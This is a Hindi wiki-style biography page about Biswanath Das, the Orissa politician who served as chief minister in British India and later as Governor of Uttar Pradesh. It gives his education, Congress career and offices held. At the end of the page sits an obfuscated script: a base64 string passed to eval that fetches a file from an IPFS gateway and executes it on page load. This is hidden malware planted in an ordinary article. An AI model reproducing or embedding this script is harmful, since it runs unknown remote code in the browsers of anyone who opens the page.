विश्वनाथ दास

भारत डिस्कवरी प्रस्तुति
दिनेश (चर्चा | योगदान) द्वारा परिवर्तित 12:24, 5 अक्टूबर 2016 का अवतरण ('thumb|200px|विश्वनाथ दास '''विश्वनाथ दास''' या...' के साथ नया पृष्ठ बनाया)
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें
विश्वनाथ दास

विश्वनाथ दास या बिश्वनाथ दास (अंग्रेज़ी: Biswanath Das, जन्म-8 मार्च 1889, गंजम ज़िला, उड़ीसा; मृत्यु-2 जून 1984, कटक, उड़ीसा) भारतीय राजनीतिज्ञ थे। ये ब्रिटिश भारत के उड़ीसा प्रान्त के मुख्यमंत्री रहे।


  • इनकी प्रारम्भिक शिक्षा कटक के रैवेनषा कॉलेज में हुई तथा कोलकाता के लाॅ कॉलेज से इन्होंने वकालात की डिग्री प्राप्त की।
  • 1919-1921 के मध्य उन्होंने गंजम ज़िले में वकालत की।
  • 1921 में उन्होंने कांग्रेस में प्रवेश किया।
  • 1920 में उन्होंने मद्रास प्रेसीडेन्सी में किसान संघ की स्थापना की।
  • 1920-1929 तक वे मद्रास कौन्सिल के सदस्य रहे।
  • 1929 में उन्होंने नमक आन्दोलन के दौरान अपनी सदस्यता से त्यागपत्र दे दिया।
  • स्वतंत्रता आंदोलन के दौरान वे कई बार जेल गये।
  • 1936 में वे उड़ीसा के विधानसभा के सदस्य निर्वाचित हुए।
  • 1937-1939 तक वे उड़ीसा के मुख्यमंत्री रहे। युद्ध के मुद्दे पर उन्होंने मुख्यमंत्री पद से त्यागपत्र दे दिया।
  • 1947-1951 तक वे संविधान सभा के सदस्य रहे।
  • कई वर्षों तक वे अखिल भारतीय कांग्रेस कमेटी के सदस्य रहे।
  • वे तीन बार उत्कल प्रदेश कांग्रेस कमेटी के अध्यक्ष निर्वाचित हुए।
  • 16 अप्रैल 1962 में उन्हें उत्तर प्रदेश का राज्यपाल नियुक्त किया गया और वे इस पद पर 30 अप्रैल 1967 तक रहे।[1]



पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. श्री बिष्वनाथ दास (हिंदी) upgovernor.gov.in। अभिगमन तिथि: 05 अक्टूबर, 2016।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>